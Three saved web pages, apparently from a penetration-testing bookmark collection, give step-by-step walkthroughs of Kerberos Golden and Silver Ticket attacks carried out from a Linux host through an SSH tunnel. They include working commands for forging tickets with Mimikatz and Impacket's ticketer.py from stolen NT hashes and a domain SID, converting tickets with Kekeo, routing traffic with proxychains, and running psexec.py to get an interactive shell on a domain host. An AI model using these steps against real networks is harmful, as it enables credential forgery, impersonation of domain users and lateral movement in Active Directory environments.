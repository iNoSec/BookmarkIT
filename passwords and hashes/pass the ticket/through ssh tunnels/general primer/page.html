<!DOCTYPE html  PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN'  'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<title>General Primer</title>
</head><body>Maybe you only have access to a Linux host that can pivot to the Windows portion of a network and cannot interface with Windows directly. If you have an SSH tunnel, you can pass Kerberos tickets just like hashes using Impackets library. Here is the example picture for the Golden and Silver pages below.<br/>
<br/>
<img src="image.png"/></body></html>