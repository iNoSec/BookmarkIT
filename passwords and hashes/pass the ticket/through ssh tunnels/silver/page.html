<!DOCTYPE html  PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN'  'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<title>Silver</title>
</head><body><b>Silver Tickets</b><br/>
Silver Tickets (forged TGS tickets) authenticate a user to a service running on a host and provides attackers with stealth and persistence options not provided by Golden Tickets. For more information about Silver Tickets and their benefits, check out Sean Metcalf’s post How Attackers Use Kerberos Silver Tickets to Exploit Systems.<br/>
<br/>
This attack requires a Linux host with the <a href="https://github.com/CoreSecurity/impacket">Impacket Library</a>and proxychains installed and a Windows host with <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a>and <a href="https://github.com/gentilkiwi/kekeo">Kekeo</a>installed. Neither host needs to be domain joined.<br/>
<br/>
<b>Forging the Ticket</b><br/>
To generate a Silver Ticket, we’ll need the following information:<br/>
<ul><li>target host machine account NTLM hash</li>
<li>target host FQDN</li>
<li>target service</li>
<li>domain SID</li>
<li>domain FQDN</li>
<li>user to impersonate</li>
</ul>
<br/>
In this example, we’ll be authenticating to the target host over SMB, so we will use the CIFS service. Sean Metcalf maintains a list of common SPNs, which can be used in Silver Tickets, <a href="https://adsecurity.org/?page_id=183">here</a>.<br/>
<br/>
At the time of writing, ticketer.py doesn’t support Silver Ticket generation. Instead, we’ll use Mimikatz on our Windows host to create a Silver Ticket .kirbi file and use Kekeo to convert the ticket to a ccache file.<br/>
<br/>
Update April 4, 2018: ticketer.py now supports Silver Ticket generation.<br/>
<br/>
Generate the Silver Ticket with Mimikatz’s <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos">Kerberos module</a>using the following syntax:<br/>
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE<br/>
<br/>
Here’s an example to create a ticket for user mbrody-da and the CIFS service:<br/>
kerberos::golden /user:mbrody-da /domain:amity.local /sid:S-1-5-21-2972629792-1506071460-1188933728 /target:WIN-RMJBTDB7QTF.amity.local /rc4:9f5dc9080322414141c92ff51efb952d /service:cifs<br/>
<br/>
Exit Mimikatz and launch Kekeo. Convert the kirbi file to a ccache file with the following syntax:<br/>
misc::convert ccache /path/to/ticket.kirbi<br/>
<br/>
You can convert multiple kirbi tickets with this syntax:<br/>
misc::convert ccaches /path/to/ticket1.kirbi /path/to/ticket2.kirbi ...<br/>
<br/>
Copy the ccache file Kekeo output to the attacking Linux host. Make sure to note the file’s absolute path on the Linux host; we will need it to set the KRB5CCNAME variable. The rest of the attack uses our Linux host.<br/>
<br/>
<b>Attack Setup</b><br/>
The remaining Silver Ticket attack setup is largely similar to that of the Golden Ticket attack, with two exceptions.<br/>
<br/>
First, we need to provide the FQDN of the target host in the /etc/hosts file, rather than the NetBIOS name. For our example, the /etc/hosts file should look like this:<br/>
<br/>
127.0.0.1	localhost<br/>
192.168.26.129	amity.local<br/>
192.168.26.128 WIN-RMJBTDB7QTF.amity.local<br/>
<br/>
The second difference is that we will need to sync our attacking machine’s time with the target host; Silver Tickets don’t communicate with the target’s domain controller.<br/>
<br/>
Follow the same steps as the Golden Ticket attack above to set the KRB5CCNAME variable, validate the proxychains configuration, establish the SSH tunnel with SOCKS proxy, and validate the tunnel with nmap (see the <a href="../golden/page.html">Golden</a>page above).<br/>
<br/>
<b>Launch the Attack</b><br/>
We can now launch the attack with psexec.py against the FQDN of the target host:<br/>
proxychains python psexec.py mbrody-da@WIN-RMJBTDB7QTF.amity.local -k -no-pass<br/>
<br/>
</body></html>