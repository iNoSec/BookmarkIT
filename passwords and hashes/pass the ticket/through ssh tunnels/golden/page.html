<!DOCTYPE html  PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN'  'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<title>General Primer</title>
</head><body>This attack requires a Linux host with the Impacket Library and proxychains installed. The host doesn’t need to be domain joined.<br/>
<br/>
<b>Forging the Ticket</b><br/>
<span style="font-family: Lora"><div style="text-align: justify"><span style="font-size: 10pt">To create a Golden Ticket, we need to have the following information from the target domain:</span><span style="font-size: 18pt"><br/>
</span></div></span><ul><li><i>krbtgt</i> account NT hash</li>
<li>domain SID</li>
<li>domain FQDN</li>
<li>user to impersonate</li>
</ul>
<br/>
We will use Impacket’s example script <a href="https://github.com/CoreSecurity/impacket/blob/master/examples/ticketer.py">ticketer.py</a> to create the Golden Ticket credential cache (ccache) file. Here is an example of the syntax to create the ccache file for the user <i>mbrody-da</i>:<br/>
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da<br/>
<br/>
To enable the Impacket example scripts to use the ccache file for authentication, rather than provided plaintext passwords or NT hashes, we need to set the KRB5CCNAME variable to the absolute path of our ccache file:<br/>
export KRB5CCNAME=/path/to/ccache/file<br/>
<br/>
Verify the variable was set correctly:<br/>
echo $KRB5CCNAME<br/>
<br/>
Now we can use the -k flag with any Impacket script that supports Kerberos authentication to use the Golden Ticket rather than providing plaintext passwords or NT hashes.<br/>
<br/>
<b>Name Resolution<br/>
</b>To ensure the Kerberos process functions, we need to modify the /etc/hosts file of our attacker machine to include entries for the FQDN of the target’s domain controller and the target host’s NetBIOS name. Here is an example:<br/>
<br/>
127.0.0.1	localhost<br/>
192.168.26.129	amity.local<br/>
192.168.26.128 WIN-RMJBTDB7QTF<br/>
<br/>
If you don’t already have the IP address of the domain controller, run nslookup on the target domain’s FQDN via the SSH session on the target’s Linux host. For example:<br/>
nslookup -type=srv _ldap._tcp.AMITY.LOCAL<br/>
<br/>
<b>Proxychains</b><br/>
We’ll be using proxychains to route our traffic over the SSH tunnel. Verify the proxychains port by reviewing the last line of the configuration file, /etc/proxychains.conf by default on Kali.<br/>
<br/>
Note: You may need to comment the proxy_dns setting in the proxychains configuration file if you are receiving name resolution issues when performing the attack.<br/>
<br/>
When we SSH into the target’s Linux host, we’ll provide the -D flag with the proxychains port. This will create a SOCKS proxy on our localhost’s port that proxychains will route traffic through. For example:<br/>
ssh unpriv@10.0.10.81 -D 1337<br/>
<br/>
To validate that the tunnel is set up properly, we can run an nmap TCP connect scan with proxychains against port 445 of the target host:<br/>
proxychains nmap -sT -Pn -p445 192.168.26.128<br/>
<br/>
<b>Time Sync</b><br/>
Golden Ticket authentication won’t work properly if the attacking machine’s time is more than approximately five minutes off from the target domain’s DC. We can use net time to check the target’s time (line 1 below) and set the time on our attacker machine (line 2) if the delta exceeds five minutes:<br/>
proxychains net time -S &lt;IP-of-DC&gt;<br/>
proxychains net time set -S &lt;IP-of-DC&gt;<br/>
<br/>
<b>Launch the Attack</b><br/>
With all the pieces in place, we can use any tool that supports ccache authentication to attack the target host. One such tool is Impacket’s psexec.py example script. Running the following command will return an interactive CMD prompt:<br/>
proxychains ./psexec.py mbrody-da@WIN-RMJBTDB7QTF -k -no-pass<br/>
<br/>
If you receive errors on launch, review the configuration of the dependencies and troubleshoot with psexec.py’s -debug flag.<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
</body></html>